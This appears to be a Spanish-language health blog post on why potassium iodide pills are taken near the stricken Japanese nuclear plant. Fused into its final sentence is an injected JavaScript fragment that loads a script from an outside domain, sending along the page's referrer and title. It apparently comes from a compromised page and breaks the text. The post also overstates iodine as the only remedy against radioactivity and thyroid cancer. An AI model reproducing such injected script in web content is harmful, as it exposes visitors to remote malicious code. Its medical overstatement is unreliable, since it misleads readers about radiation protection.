Salud y belleza » Enfermedades, Medicina

Japón, el sismo y las réplicas (en la salud)

Sin Comentarios

Frente a una catástrofe como la que azota al Japón por estos tiempos, es recurrente encender la televisión y escuchar toda clase de opiniones, autorizadas y no tanto.

De pronto, un periodista de espectáculos puede volverse un aparente especialista en Geología o un conductor transformarse en profesional de la salud. A causa de este peligroso efecto que bien podríamos llamar “periodismo de desesperación y no de investigación” es necesario, de vez en cuando, poner un alto y explicar ciertas cosas: la relación entre los japoneses infectados por radiactividad y el material conocido como yodo, por ejemplo.

¿Por qué es tan importante que todos los lugareños que tienen domicilio en las cercanías a la central en peligro utilicen el yodo? Bien, ocurre que al producirse una fuga en una industria de esa clase, y al esparcirse mediante el aire o por vía gaseosa, la glándula conocida como tiroides tiende a captar el yodo como si se tratara de un efecto imán.

Naturalmente, ese yodo que se desprende del aire está cargado de peligrosa radiación y, como sabemos, esta sustancia genera en el organismo un fuerte desorden celular (lo cual puede causar cáncer o, incluso, situaciones peores). Por lo tanto, al introducir una pastilla de yodo limpio en el organismo se tiende a sobrecargar de cierta manera esa glándula para que, así, el cuerpo capte la menor cantidad posible de yodo contaminado.

De momento, el unico remedio contra la radioactividad y el cáncer de tiroides es el yodo.}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.